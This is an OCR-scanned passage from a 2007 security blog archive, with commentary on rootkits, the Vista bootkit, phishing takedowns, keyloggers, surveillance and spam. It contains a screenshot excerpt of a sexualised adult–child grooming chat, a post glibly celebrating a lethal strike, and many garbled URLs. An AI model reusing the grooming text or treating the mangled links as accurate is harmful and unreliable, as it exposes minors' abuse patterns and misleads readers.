cant damage to the Soviet economy. Its ultimate bankruptcy, not a bloody battle or nuclear 
exchange, is what brought the Cold War to an end. In time the Soviets came to understand 
that they had been stealing bogus technology, but now what were they to do? By implication, 
every cell of the Soviet leviathan might be infected. They had no way of knowing which 
equipment was sound, which was bogus. All was suspect, which was the intended endgame 
for the operation. The faulty software was slipped to the Russians after an agent recruited by 
the French and dubbed "Farewell" provided a shopping list of Soviet priorities, which focused 
on stealing Western technology. " 


Excluding the spy thriller motives, nothing’s impossible the impossible just takes a little 
while, and the same goes for [3]SCADA devices vulnerabilities and [4]on purposely shipping 
buggy software. Anti virus vendors will get even more pressure trying to protect their 
customers from not only the malware released by malware authors, but also from the one 
courtesy of law enforcement agencies. [5]Cyber warfare is here to stay, [6]no doubt about it, 
but using malware to monitor suspects will perhaps prompt them to keep an eye on the last 
time their AV software got updated, and still keep pushing the update button in between. 


. http://www. computerworld.com.au/index.php/id; 596622433; fp; 4194304; fpid; 1 


. http: //news .zdnet . co.uk/software/0, 1000000121, 39147917, 00.htm 

. http: //ddanchev.blogspot.com/2006/10/scada-security-incidents-and-critical.htm 
Se TTT, 

GZ eee CTT 
. http: //ddanchev . blogspot . com/2006/05/whos-who- in-cyber-warfare html 


1 
2 
3 
4 
5 
6 


3.3.30 Video on Analyzing and Removing Rootkits (2007-03-20 20:17) 


Courtesy of [1]WatchGuard 
part three of their malware analysis series walks you through various commercial and free 
utilities for detecting and removing rootkits : 


"In this episode, Corey and his Magic White Board show how kernel mode rootkits work. 
Also covered: recommended tools and techniques for detecting and removing rootkits. " 


[EMBED] 


1. http://finance.google.com/finance?q=WatchGuard 
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3.3.31 A Fortune 500 Blogosphere? Not Yet (2007-03-20 23:49) 


[1]Enterprise 2.0 is slowly [2]gaining grounds and you cannot deny it despite top manage- 
ment’s neutral position on yet another major "[3]Reengineering of the Corporation". Supply 
chain management was perhaps among the first departments to really utilize the power 
of real-time information, and interoperable data standarts - a mashup-ed ecosystem - but 
improving your employees productivity through Web 2.0 tools such as intranet blogs and wikis 
remains just as unpopular as actual Fortune 500 companies blogging? But how come? Lack of 
evangelists? Not at all. There’s one minor obstacle, you cannot teach an old dog new tricks, 
unless of course you dedicate extra investments into training him, which is exactly what | 
feel is happening at the corporate stage - everyone’s patiently waiting [4]for the concepts to 
mature before training and implementation [5]happen for real. What’s the current attitude 
towards external Web 2.0 activities? A Fortune 500 blogosphere isn’t emerging as fast as the 
mainstream one is according to the [6]Fortune 500 Business Blogging Wiki : 


"a directory of Fortune 500 companies that have business blogs, defined as: active 
public blogs by company employees about the company and/or its products. According to our 
research, 40 (8 %) of the Fortune 500 are blogging as of 10/05/06. The navigation sidebar to 
the right lists all the Fortune 500 companies. The list below are the ones that we’ve found so 
far that have public blogs as defined above. Please help us by entering data on those we’ve 
missed. ONLY Fortune 500 companies, please. If you’re not sure if it’s on the F500 list (it 
includes US companies only), check the sidebar. If it’s not there, consider adding it to the 
[7]Global 1,000 Business Blogging page instead. " 


| think the main reason behind this are the inevitable channel conflicts that will arise 
from let’s say Pfizer’s blogging compared to using the services of their traditional advertising 
and PR agencies - | also imagine a links density analysis of their blog indicating the highest 
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% of links pointing to Erowid.org. But ask yourself the following, what if these very same 
agencies start offering bloggers-for-hire in their portfolio of services, would the big guys get 
interested then? Or when will they [8]start understanding the [9]ROI of blogging? 


ttp://www.enterprise2conf.com/ 


ttp://www.businessweek.com/technology/content/jun2006/tc20060605_424102.htm 


. http: //www.amazon.com/Reengineering-Corporation-Manifesto-Business-Revolution/dp/088730687 


1 
2 
3 


4. http://en.wikipedia. org/wiki/Enterprise_social_software 


. http: //www.enterpriseweb2.com/?p=10 
. http://www.eu.socialtext.net/bizblogs/index.cgi 


5 
6 
7. http://www.eu.socialtext .net/bizblogs/index.cgi?global_1_000_business_blogging 
8 
9 


. http://blogs.forrester.com/charleneli/2006/10/calculating_the.htm 


. http://blogs.forrester.com/charleneli/2007/01/new_roi_of_blog.htm 


3.3.32 Unsigned Code Execution in Windows Vista (2007-03-21 23:01) 


USER FRIENDLY by J.D. “Iliad Frazer 


:} [TS ABOUT WINDOWS VISTA. 
BILL. we HAVE PROBLEMS. 


M./5] [T SEEMS MARKETING HAS 


Nitin Kumar and Vipin Kumar are about to [1]present the Vbootkit at the upcoming [2]Blackhat 
and [3]HITB cons : 


"We have been recently researching on Vista. Meanwhile, our research for fun lead us 
to some important findings. Vista is still vulnerable to unsigned code execution.vbootkit is 
the name we have chosen ( V stands for Vista and boot kit is just a termed coined which is 
a kit which lets you doctor boot process). vbootkit concept presents how to insert arbitrary 
code into RC1 and RC2, thus effectively bypassing the famous Vista policy for allowing only 
digitally signed code to be loaded into kernel . The presented attack works using the custom 
boot sectors.Custom boot sector are modified boot sectors which hook booting process of the 
system & thus, gains control of the system. Meanwhile, the OS continues to boot and goes on 
with normal execution. " 


Vulnerabilities are an inevitable commodity, they will always appear and instead of counting 
them on an OS or software basis, consider a vendor’s response time while following [4]the 
life of the security threat. | never actually liked the idea of an insecure OS, to me there’re 
well configured and badly configured OSs in respect to security, but then again if you’re 
a monocultural target the way Microsoft is, you'll always be in the zero day spotlight. A 
security breach will sooner or later hit your organization, don’t talk, act and pretend you’re 
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100 % secure because you cannot be. Instead a little bit of proactive measures balanced 
with contingency planning to minimize the impact is what should get [5]a high priority in your 
strategy. Here’s a [6]related post. 


Cartoon courtesy of [7]Userfriendly.org 


1 ftp: //roctkit. con/newsread, print. php?newsid-671 
2. http://www. blackhat . com/html/bh-europe-07/bh-eu-07-schedule html 
3, http: //conference. hitb. org/hitbseccont2007éubai/ 

4. http: //ddanchev . blogspot .com/2007/01/life-of-security-threat html 


5. http: //ddanchev. blogspot .com/2006/05/valuing-security-and-prioritizing-your.htm 


6. http: //ddanchev. blogspot .com/2006/03/5-things-microsoft-can-do-to-secure.htm 


7. http: //www.userfriendly.org/ 


3.3.33 A Documentary on CCTVs in the U.K (2007-03-21 23:48) 


[1]Every breath you take, every move you make, I'll be watching you. Used to be a great song, 
but has a disturbing context these days. Nino Leitner’s [2]EveryStepYouTake documentary on 
the state of surveillance in the U.K will premier this month, and | suspect the full version will 
be [3]made available for the world to see too : 


"Trying to answer questions like these, Nino Leitner’s one-hour documentary “EVERY 
STEP YOU TAKE” digs deep into an entirely British phenomenon: nation-wide video surveil- 
lance. It features formal interviews with the surveillance researcher Professor Clive Norris, 
Deputy Chief Constable Andy Trotter from the British Transport Police, a representative of 
Britain’s largest civil rights group Liberty, a CCTV manager from a public local CCTV scheme, 
experts in the field of transport policing and many more. The surveillance reality in Britain is 
compared with another member of the E.U., Austria. Compared to the UK, it can be seen as a 
developing country in terms of CCTV, but just as elsewhere all over the world, politicians are 
eager to extend the surveillance gaze. 


Here’s an animation to help you [4]explain what surveillance means to your cat, another one 
[5]fully loaded with attitude, and let’s not exclude [6]the big picture. 
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Related posts: 


[7]London’s Police Experimenting with Head-Mounted Surveillance Cameras 
[8]Head Mounted Surveillance System 

[9]Eyes in London’s Sky - Surveillance Poster 

[10]External links 


OMDNAURWNH 


10 


http://en.wikipedia.org/wiki/Every_Breath_You_Take 


_hetp:/ /wiw.everystepyoutale.org/ 
_ http://w. guba.con/vatch/3000030387 

_netp:/ /wuw. youtube. con/vatch?v=j JTLLIUjvE0 
 inp://woy. off org/Privacy/Moustere] 

. http: //ddanchev. blogspot . com/2007/03/documentary-on-echelon-spy-system. html 


http: //ddanchev. blogspot .com/2006/11/londons-police-experimenting-with-head.htm 


. http: //ddanchev.blogspot .com/2007/01/head-mounted-surveillance-system. html 


http: //ddanchev.blogspot .com/2007/01/eyes-in-londons-sky-surveillance-poster.htm 


. http://del.icio.us/DDanchev/Privac 


3.3.34 Zoom Zoom Zoom - Boom! (2007-03-22 00:04) 


If you could only eradicate the radicalization of immature islamic youth over the Internet with 
the push of a button. Great surgical shot! 


[EMBED] 


3.3.35 Tricking an UAV’s Thermal Imagery (2007-03-22 20:41) 


Give me a hug so that we [1]become "thermally one" for the thermal paparazi to see. When 
you know how it works you can either improve, abuse or destroy it. Very interesting abuse of 
technology by the people knowing how it works : 
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"The Marines cuffed Awad and took him to a nearby bomb crater. At this point the 
drone approached for its first pass overhead. One of the group moved forward and dug a hole 
at the crater, while the others posed with Awad behind a wall. The recorded thermal imagery 
from the aircraft seemed to show troops watching an insurgent digging by the road, perhaps 
to place a bomb. After the drone had passed, the group moved Awad forward to the hole. But 
at this point the surveillance platform returned, so one of the Marines wrapped himself around 
Awad so as to create a single thermal signature, disguising the captive’s presence. 


If you’re under thermal surveillance a cold shower’s your invisibility coat if one’s avail- 
able. [2]Wired has some photos on this story. 


1. http: //www.theregister.co.uk/2007/03/22/murder_marines_fool_drone 
2. bttp://www.wired.com/news/technology/0, 73012-0.htm 


3.3.36 Take this Malicious Site Down - Processing Order.. (2007-03-22 21:00) 


Yet another pay-pal-secure-login.tld domain gets registered, and [1l]even more ironic in its 
directory listings you'll be able to digg out several other financial institutions and online 
companies logins, even competitors . Financial institutions cannot cope with the level of such 
registered domains and some - even after reported to the usual abuse account - remain active 
for weeks to come. So how do you protect these businesses and [2]cash in between for doing 
so? [3]Looks like [4]RSA are diversifying their service from phishing hosting sites to malware 
hosting ones : 


EMC’s RSA division plans to launch a new service next month that will help financial 


institutions take down Web sites associated with malicious Trojan Horse software . The service 
is planned as an extension to the FraudAction phishing takedown service already offered 
by RSA, said Louie Gasparini, co-chief technical officer with RSA’s Consumer Solutions unit. 
"We’re leveraging the same infrastructure we already have in place... and now we’re focusing 


796 


our attention on how Trojans work," he said. Gasparini said he expects financial services 
companies, auction sites, and online merchants to use the service. "It’s really allowing the 
institution to better protect its customers," he said. " 


Can RSA really cash in by re-intermediating the current communication model, and most 
importantly do a better job? It can sure allow the targeted companies to focus on innovation 
and growth, not on online impersonation attacks so | find this a sound product line extension, 
but need more performance stats to offer valuable recommendations. 


According to [5]the latest Anti-Phishing.org report, the threatscape looks very favorable 
in respect to 


Statistical Highlights for January 2007 


e Number of unique phishing reports received in January: 29930 

e Number of unique phishing sites received in January: 27221 

e Number of brands hijacked by phishing campaigns in January: 135 

e Number of brands comprising the top 80% of phishing campaigns in January 10 

« Country hosting the most phishing websites in January: United States 
e Contain some form of target name in URL: 24.5 % 

e No hostname just IP address: 18 % 

e Percentage of sites not using port 80: 3.0 % 

e Average time online for site 4 days 

e Longest time online for site 30 days 


communicating with the major country hosting phishing sites - the U.S, followed by China 
and South Korea. In between companies diversifying their portfolios of services and products, 
there’s one other thing to keep in mind and that’s how can you achieve the same results in 
more cost effective way than the commercial propositions? And can you actually? Do you 
even have to dedicate financial resources to shut down these sites compared to educating 
your customers on how to use their brains? Ask yourself these questions before losing it in 
a [6]budget allocation myopia. Something else to keep in mind - ISPs will also start getting 
interested in the idea of equal distribution of revenues given the sound business model . 


Related posts: 
[7]The Phishing Ecosystem 


[8]Anti-phishing Toolbars - Can You Trust Them? 
[9]Google’s Anti-phishing Black and White Lists 


ttp://ddanchev. blogspot .com/2006/12/phishing-domains-hosting-multiple. htm 


| hetp://wvy xen, con/node.aspx?id-302] 
ftp: / fnew rae, con/onparience/consuner irandAction nee 6 ia 

_ http://www, nfoworla. con/article/07/03/16/Areatrojantakedovn, 1. Heal 
frp //evv antiphiahing.ong/reporta/epeg_report_jemuny_2007 pal 

_ http: //adanchev blogspot. con/2006/07 /budget~allocation-ayopia-and.Ktal 
| http://adanchey blogspot .con/2007/02/phishing- ecosysten. html 


ttp://ddanchev.blogspot.com/2006/03/anti-phishing-toolbars-can-you-trust .htm 


ttp://ddanchev.blogspot.com/2006/09/google-anti-phishing-black-and-white.htm 
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3.3.37 Ghosts in the Keyboard (2007-03-27 22:31) 


KeyGhost is a nasty type of [1l]hardware keylogger that if ignored as a concept can truly 
expose a lot of data, with one downsize - the logged data has to be retrieved physically in the 
very same fashion the keylogger got installed. Here’s [2]how the six-year-olds do it: 


A six-year-old girl has successfully hacked into the UK Parliament’s computer system, installing 
a keylogger onto an MPs machine. Guildford MP Anne Milton agreed to leave her computer 
unattended for 60 seconds as part of a test of House of Commons IT security by the BBC’s 
Inside Out programme. Brianagh, a schoolgirl from Winchester, took just a quarter of that time 
to install the keylogging software without being noticed. Such easily available applications 
record all the keystrokes made on a machine and can therefore be used to steal passwords, 
financial data and personal information. " 


The article starts by mentioning the software and ends up with a quote on the "device" 
itself. The story is a great wake up call, especially the six-year-old girl part, as it will position 
the computer system’s security as an extremely weak one in the minds of the masses, no 
wait the tax payers. But age doesn’t really matter here, it’s the idea that the majority of 
insecurities have an outside-towards-inside trend, namely they come from the Internet, not 
[3]from within as [4]we see in this case. In case you’re interested, there’re already various 
business development activities in releasing a [5]laptop based PCI card keylogger given the 
obvious incompatibilities with a PC. 


Related posts: 


[6]USB Surveillance Sticks 


[7]Espionage Ghost Busters 
1. 


2. http://www. pcpro.co.uk/news/108769/sixyearold-installs-keylogger-on-mps-computer.htm 


3. http: //ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible.htm 


4. http: //ddanchev. blogspot .com/2006/03/old-physical-security-threats-still.htm 


5. http: //www.tech2.com/india/news/laptops/laptop-hardware-keylogger-in-mini-pci-card/4560/0 
6. http: //ddanchev. blogspot .com/2007/03/usb-surveillance-sticks.htm 
7. http: //ddanchev. blogspot .com/2006/05/espionage- ghosts-busters.htm 
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3.3.38 You’ve Got Something in Your Eye (2007-03-27 22:53) 


ILLUSTRATED BY Maxie Chambliss 


Or that’s what the always getting bigger, [1]Big Brother says : 


Avigilon’s 16 megapixel cameras are the first surveillance cameras that can continuously 
monitor large fields of view while maintaining high levels of detail. In the past, security profes- 
sionals have had to rely on opto-mechanical PTZ cameras for wide field of view surveillance 
and were forced to make a tradeoff between field of view and image detail. Avigilon’s 16 
megapixel cameras provide a superior solution for post incident investigation because they 
provide detailed images of the entire field of view, without the requirement of an operator to 
control the camera. " 


| like the press release debunking the idea of real-time incident prevention due to CCTV 
surveillance compared to historical performance and analyzing [2]past events. Not that’s it’s 
not possible, but [3]the investments are not worth the ROI, and if self-regulation is the single 
most visible return on investment here, that’s a bad deal. But in reality, keep on living in a 
CCTV myopia world, where covering the "blind spot" of one camera gets covered by installing 
another one, and the "blind spot" of the second one gets covered by a third one. It’s about 
time your CCTV expenditures start declining given reasonable metrics defining a successful 
investment appear soon. 


Now let’s hope these [4]cameras never get installed in public restrooms, shall we? 
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1. http: //www.avigilon.com/company/press/16MegapixelwithDigitalPTZ. htm 
2. http: //ddanchev. blogspot .com/2006/08/big-momma-knows-best. htm 

3. http://www. csoonline.com/read/090105/roi_3826.htm 

4. http: //ddanchev. blogspot .com/2006/06/big-brother-in-restroom.htm 


3.3.39 Real Time Spam Shredding (2007-03-28 14:14) 


Wednesday’s portion of hahaha-ing. This is the work of a pragmatic genious, [1]the revenge 
of the nerds or call it whatever you want the idea is simple - what gets detected as spam 
gets printed and shred in real-time for interactivity. How much would it cost for a Fortune 
500 organization to implement such a feature, a "fortune" by itself for sure, but an anti-spam 
vendor looking to differentiate its headquarters might be interested in implementing such a 
system for their corporate clients to see while walking around. 
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Spamtrap" is an interactive installation piece the prints, shreds and blacklists soam email. It 
interacts with spammers by monitoring several email addresses | have created specifically to 
lure in spam. | do not use these email addresses for any other communication. | post individual 
email addresses on websites and online bulletin boards that cause them to be harvested by 
spambots and then to start receiving spam. Because | know that all email sent to these email 
addresses are spam, | have set the installation to print and then shred each email as it arrives. " 


[2]Read more about the Spamtrap in this blog. There’s simply so much spam these 
days, you can even create large data sets in order to [3]render surrealistic soam art paintings, 
no kidding. 


1. http://billshackelford.com/home/portfolio_spamtra_826 
2. http://billshackelford.com/home/blog 
3. http: //ddanchev. blogspot .com/2006/07/beauty-of-surrealistic-spam-art .htm 


3.3.40 IMSafer Now MySpace Compatible (2007-03-30 00:25) 


child? *Q adult1 


“horny ...” 
: 10/18/06 at 11:15PM 
"adult1" 
; child1: i like 2 plan stuff........ kinda a neat freek lol 
Considered: adult: lol....saturday probably during the night if that's 
ok 
Ve ry child1: thas fine....... like 7 mebbe? 
adult: yeah sounds good 
Dangerous child1: kewl........ 7 ill have plenny of time 2 clean up an 
based on 19 votes stuff... :D 
adult1: 3 
How concerned should other child: 


i o 
parents be aboutthis user? adult1: hey | gotta go now 


& & & & & adultt: do you feel horny at all? 
child1: a lil......butig2g 2 bed soon 
adultt: ok I'll talk to you tomarrow ok 
child1: okies ** 


Archive without vote 


MySpace, the world’s most popular social networking site, and an online predator’s dream 
come true has been actively discussed since the very beginning in respect to the measures 
News Corp’s property takes to prevent child abuse through the site. Let’s face the facts, of 
course underaged kids will confirm they’re over 18/21 in order to use the site, and of course 
online predators will continue finding ways to socially engineer a online contact with the 
ultimate idea to meet in the physical world. Why? Because children provide way too much 
sensitive information in order to virtually socialize and meet new buddies, thus indirectly help- 
ing pedophiles pinpoint key "contact points" in the future. If you as a parent start paranoia-ing 
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around, you’ll end up with the wrong conclusion that the risks are not worth the benefits, 
totally forgetting that forbidden fruits taste much better and it’s children we’re talking about - 
they break the established rules in principle. No matter the registration procedures in place, 
you cannot stop an [L]lonline predator registering and communicating with children at the site, 
what you can do however is educating your children, and emphasizing on filtering not spying 
activities in order to protect them. 


The team behind IMSafer, a service which | covered in a [2]previous post, have realized 
the potential benefits of [3]Jintroducting a MySpace compatibility, and so it recently became a 
reality : 


" IMSafer’s updated language-analysis engine can scan individual MySpace postings for 
potentially dangerous, threatening or sexually explicit content, the company said. Users 
can download the tool from the company’s [4]Web site , said Brandon Watson, CEO and 
founder of the company. Traditional parental control software generally can filter and block 
Web sites but can’t identify possible dangerous interactions on increasingly popular social 
networking sites such as MySpace, he said . While most sexual solicitations of children still 
come through instant messaging software, online predators are increasingly using MySpace 
to initiate contact with potential victims, Watson added. " 


Don’t forget the bottom line, if you’re in a fragile relationship with your kids, pretty much 
anyone online could take advantage of their vulnerable condition. The irony goes that people 
you've never met will show more respect to you than the people you actually fight to get 
respect from. From a children’s perspective that’s you parents! [5]Here are several more 
[6]Jarticles worth going [7]through, especially this [8]post-event response to what’s an internal 
problem to me. 


1. http: //ddanchev. blogspot .com/2006/10/registered-sex-offenders-on-myspace.htm 


ttp://ddanchev. blogspot .com/2006/10/filtering-good-girls-and-im-threats.htm 


6. http://www. csoonline.com/read/030107/fea_myspace.htm 
7. http: //www.cbsnews.com/stories/2007/03/13/tech/main2563414. shtm 


3.3.41 Cyber Traps for Wannabe Jihadists (2007-03-30 00:50) 
‘Fislain 


The Muslim Nation does not 


in this Issue: 


Cover Story: 
of Ira Around the World 
oie Following the destruction of the Soviet Union 
Editorial: at the hands of the Mujahideen in Afghanistan, Afghanistan 
the US administration started to assume a more ALMuslimah 
The Muslim | aggressive stance in its international policies. AFMUSIMaNn 
Nation As a result, they launched a crusade on Australia - New 
does not Afghanistan, and then claimed a so-called Anti-Terror Laws 
concedeto | victory over Taliban’s Islamic Emirate, eliminating 
defeat the rule of Shari’ah and replacing it with a ; 
puppet anti-Islamic government that showered rag: Resistance to 
Local Affairs: | the Afghani people with promises of a better life the crusade 


and freedom. 


occupation 


ACI an tha 


| guess that’s what happens when you don’t have a single clue on where the real conversation 
and recruitment is happening, so you decide to [1]create your own controlled jihadi communi- 
ties to monitor. A case study on false feeling of effectiveness in Australia : 


" FEDERAL police are setting up bogus jihadist websites to track extremists who use cy- 
berspace to recruit followers and plan attacks. The undercover operation, disclosed yesterday 
by Australian Federal Police Commissioner Mick Keelty, is an assault on arguably the most 
powerful weapon of the global jihadist movement, the internet. Mr Keelty said police were 
working closely with foreign governments and the military’s Defence Signals Directorate. " 
We have worked with some foreign countries through our undercover program, establishing 
our own websites, to capture some of the activities that are going on on the internet," he told 
a security conference in Sydney. 


"Some of the activities" will have absolutely nothing to do with the real situation, and 
even if someone bothers to open up a discussion on your second hand jihadi site, it’ll be 
a classic example of a moron. Fighting for a share of the online jihadi traffic is so unprag- 
matic, unnecessary, time and resource consuming that you’d better rethink the entire idea, 
emphasize on intelligence data sharing with other countries in case you cannot monitor the 
emergence of local communications, and keep an eye on them. 


Meanwhile, a talk on the street is heating up : 
- Hello underaged kids, | see you’re having trouble getting hold of some quality Russian vodka 
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over here in front of that store, | can probably give you hand with this? 

- Yes, please, please!!! 

- Aha! Agent Temptation from the [2]Thought Police here, you’re busted for desiring to drink 
alcohol even without drinking it! Put your tongues on your head so | can see them! 


In the long term we may actually have a real-life bomber confessing of visiting online ji- 
had community before the plot took place, that, ooops, happens to be one of the fake ones. 
Now we have double ooops. [3]Many other [4]related posts to [5]provide you [6]with an 
[7]loverview of the [8]big picture and a [9]countless number of [10]budget allocation myopia 
failures that emphasize on technological approaches to [11]detecting radical jihadi propa- 
ganda, whereas [12]cyber jihadists and future terrorists are getting efficient in generating 
"noise sites", ones your crawlers are so good at picking up. 


ttp://www.theage.com.au/news/national/police-set-up-cyber-trap-for-jihadists/2007/02/26/1172338550906. ht 


aie 


. http: //en.wikipedia.org/wiki/Thought _Police 
. http: //ddanchev. blogspot .com/2007/02/terrorism-and-encryption.htm 


http: //ddanchev. blogspot .com/2007/02/characteristics-of-islamist-websites .htm 


. http: //ddanchev. blogspot .com/2007/01/preventing-massive-al-qaeda-cyber.htm 


ttp://ddanchev. blogspot .com/2007/02/forensic-examination-of-terrorists-hard.html 


. http: //ddanchev. blogspot .com/2006/08/steganography-and-cyber-terrorism.htm 
. http: //ddanchev. blogspot .com/2006/12/current-state-of-internet- jihad. html 


O©OMONOAURWN 


ttp://ddanchev. blogspot .com/2006/12/full-list-of-hezbollahs-internet-sites.htm 


10. http: //ddanchev.blogspot .com/2006/09/hezbollahs-dns-service-providers-from.htm 
11. http://del.icio.us/DDanchev/Cyberterrorism 


12. http: //ddanchev.blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 


3.4 April 


3.4.1 Cyberpunk is Dead! (2007-04-01 20:29) 


Yeah sure, on the [1]1st of April only! Enjoy this marvelous cyberpunk compilation with [2]Juno 
Reactor as a background music. A group whose works such as Pistolero and Rotor Blade 
continue reminding me of the good old school psychedelic vortexes we used to spin in - that’s 
of course in a previous life. 


[EMBED] 


1. http: //en. wikipedia. org/wiki/April_Fools{27_Da 


2. http: //en.wikipedia.org/wiki/Juno_Reacto 
804 


3.4.2. Taking Down Phishing Sites - A Business Model? (2007-04-04 13:46) 


Article Date « 

.usuarios.tycos.es] Site has gone offline 2007-03-01 12:33 
. usuaros.lycos.es| Status: contacted hosting => resolved (monitoring) 2007-03-01 12:31 
/usuarios.tycos,es] Note Added: 0000833 2007-03-01 12:22 
.usuarios.lycos.es] Status: verified => contacted hosting 2007-03-01 12:20 
,usuarios.lycos.es] Note Added: 0000829 2007-03-01 12:02 
.. usuarios.tycos.es] Status: unverified «> verified 2007-03-01 12:02 
usuarios. tycos.es| New Attack 2007-03-01 11:54 


[1]Processing orders for taking down malicious or fraudulent web sites is gaining grounds with 
not just RSA providing the service, but also, with [2]Netcraft joining the process : 


" Netcraft will identify, contact and liaise with the company responsible for hosting the 
fraudulent content. Netcraft enjoys excellent relations with the hosting community, and many 
of the world’s largest hosting companies are Netcraft customers. Netcraft can exercise its 
existing relationships with these companies to provide a swift and smooth response to the 
detection of the site. If the hosting company is reputable, this may be sufficient to ensure a 
prompt end to the fraudulent activity. However, some hosting companies offer fraud hosting 
as a service whereby they are incentivized to keep the site up as long as possible, and this 
necessitates more extensive action. " 


How does Netcraft differentiate its value proposition compared to RSA’s? Netcraft’s core 
competency is monitoring of web sites and providing historical perforce reports regarding var- 
ious server variables, and they’ve been doing it for quite some time. Moreover, the company 
directly relies on the success of its anti-phishing toolbar in respect to gathering raw data on 
new phishing sites, thus, a future customer in the face of company whose brand is attacked. 
While the business models seem sound to some, it’s worth discussing their pros and cons. 
Will ISP implement an in-house phishing sites monitor to compete with the services offered by 
third-party vendors - they could definitely delay their actions given the huge infrastructures 
they monitor and the lack of financial incentives for the timely shut down - or will ISPs and 
vendors figure out a way to build an ecosystem between themselves? The pioneer advantage 
is an important despite the common wisdom that even if you have an innovative idea and a 
market that’s not ready to embrace it it wouldn’t get commercialized. 


In the past, there were [3]futile attempts by banks to utilize the most commonly abused 
phishing medium - the email - to build awareness among their customers on the threats of 
phishing which isn’t the way to solve the problem. You’ve got many options in respect to 
your customers - either educate them, enforce [4]E-banking best practices or deny them the 
service if they don’t comply, be a paper tiger and forward the responsibility for fraudulent 
transactions to their gullibility, or improve the entire authentication process. As we have 
seen two-factor authentication may improve consumer’s confidence, but [5]we’re also seeing 
[6]malware authors getting pragmatic and [7]adapting to the process as well. Flexibility 
also stands for better transparency of the process - respect to the banks providing me with 
the opportunity to receive an SMS each and every time money come and go out of the account. 


[8]OPIE and [9]multiple factor authentication are inevitable, but a [10]customer’s aware- 
ness of the threat is worth more than another keychain of OPIE generators. The rest are 
[11]Junmaterialized E-commerce revenues due to customers still fearing the risks are not 
worth the benefits. 
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http: //ddanchev. blogspot .com/2007/03/take-this-malicious-site-down.htm 


. http: //news .netcraft.com/archives/2007/03/30/phishing site_takedown_countermeasures.htm 


ttp://ddanchev. blogspot .com/2006/04/heading- in-opposite-direction.htm 


http: //ddanchev. blogspot .com/2006/05/no-anti-virus-software-no- e-banking. htm 


| 
ttp://www.hispasec.com/laboratorio/banking trojan_capture_video_clip.pdf 

| 

; 

ttp://www.zdnet .com.au/news/security/soa/SMS_security_for_NetBank_users/0, 130061744, 339274518, 00.htm 
10. 

11. 


SO. GR GQ NP 


{ee} 
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3.4.3 Interacting with Spam Emails (2007-04-04 14:16) 


Kevin & Kell ©2003, Bill Holbrook Buy the books at www.plan9.org 
I'M THE Wipow OF THE | I HAVE A PROFITABLE { LIVE ON WHY ARE [IF SHE'S 
FORMER PRESIDENT OF | WoRK-AT-HOME BUSINESS,| “PRINTER INK MY E-MAILS | LEGIT, 1 


SELLING ONLINE COLLEGE] DPAIVES INTHE | BEING 
DEGREES IN PHARMA- | TOWN OF “SINGLES, LOCKED? 
CEUTICALS AND BopY | ZIP:*H.GH. S$EX.* 
ENLARGEMENTS. HERE'S MY 
QUESTION... 


THE COUNTRY OF 
“VIAGRA: 


Unbelievable, and you wonder why is spam on the verge of destroying email as the once so 
powerful communication medium. What | don’t like about survey’s like these is that they barely 
report their findings without providing further clues on the big picture and actually assess the 
findings in the way they should. The ultimate question thefore always is - So What?! Interacting 
with spam in any way, be it clicking on a link inside the email, loading the bugged with remote 
images emails, and the most moronic of them all - unsubcribing from the spammer’s URL will 
only result in verifying that your email is active . What follows is a syndication of this email by 
different soammers and a flood of advertisements in languages [1]you’ll probably never speak : 


" Bombarded by spam, e-mail users are eager for tools like a "report fraud" button that 
would help weed out unwanted messages that litter inboxes, according to a survey by the 
Email Sender and Provider 


Coalition released on Tuesday. More than 80 percent of e-mailers already use tools such as 
"report spam" and the "unsubscribe" button to manage their in-boxes, the survey found. The 
survey, which was also conducted by marketing research firm Ispos, polled 2,252 Internet 
users who access e-mail through service providers such as AOL, MSN/Hotmail, Yahoo! and 
Gmail. " 


Having a report spam button means the technological measures in place to prevent the 
spam from reaching a mailbox have failed, a very bad sign by itself. Before asking for a report 
spam button [2]understand how spammers obtain [3]your email at the first place and try to 
prevent it. Standardizing the "report spam" button on multi-vendor level would never happen. 
That’s mainly because vendors actually compete on spam detection results, just like they 


806 


should do with the idea that competition not only keeps them in a good business shape, but 
has the potential to best serve the customer. 


There’s also the mean wisdom of crowds to keep in mind. Remember when [4]Hotmail 
was blocking Gmail invites? 


ee eee all Canada (Scarborough, Ontario) 
Tiree Slocklisted By: SpamHaus 


Srlad-tte-ad eel approximately 2 years, 5 months, 1 week ago 
er iag-tie-a er tees Within 3 months, 3 weeks 
Harvester Sightings |: 


3,297 Visit(s) to 776 honey po 


Sr igu-ic-e-eiies Oo message(s) resulting from harvests 
0.09% of harvests result in messages 
Beye Vrhicy seen with 1 user-agent(s) 


Siil-woeelueeriaa-toe Fastest: 2 days, 19 hours, 16 mins, 42 secs 

Weegee ris slowest: 11 months, 14 hours, 30 mins, 10 secs 
Average: 3 months, 3 weeks, 2 days, 8 hours, 4 mins, 2 
$ecs 

Std Dev: 6 months, 1 week, 1 day, 12 hours, 34 mins, 32 
$ecs 


Associated Mail Servers Harvester's Claimed User Agents 
209.167.50.21 
IPs In The Neighborhood 

209.167.50.21 (S) 


Was it an undercover corporate policy, or Hotmail fans were clicking the report spam button on 
received Gmail invites to make sure Hotmail subscribers never get the chance to receive them? 
Empowering the massess in a Web 2.0 windom of crowds style is tricky, as the way competitors 
click on each other’s AdSense ads during lunch breaks, the very same way they’d subscribe to 
a competitor’s email notifications and have them reported as spam. Contribute to [5]Project 
Honeypot if your infrastructure allows you to and see them crawling. Cartoon courtesy of Bill 
Holbrook. 


1. http://news.yahoo.com/s/nm/20070327/tc_nm/email_spam_dc 


2. http: //ddanchev. blogspot . com/2006/09/email-spam-harvesting-statistics.html 


3. http://ddanchev. blogspot .com/2007/01/inside-email-harvesters-configuration.htm 
4. http://slashdot.org/article.p1?sid=04/06/21/1150236 
5. http://www.projecthoneypot.org/statistics.php 
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3.4.4 Hijacking Your Fear (2007-04-04 15:28) 


Have no fear, the [1L]toxoplasma gondii parasite is here. Just like a decent piece of malware 
exploiting a zero day vulnerability in an anti virus software, shutting it down or making sure it 
cannot obtain the latest signatures while totally ignoring the host’s firewall, this [2]parasite 
controls the fate of rats and mice in a targeted nature : 


by hijacking the part of the brain that makes the rodents naturally fear cats, a new study show. 
The exquisite precision leaves intact all other neurological mechanisms for learning to avoid 
danger, so the rodents learn to survive all hazards except being eaten by cats - the only form 
of death beneficial to the parasite. " 


Very interesting example of targeted attacks on a rat’s brain courtesy of mother Nature’s 
ghost-hacking capabilities. Just a whisper in my ghost - hope the parasite doesn’t become 
cats-compatible and have them fear the mice. 


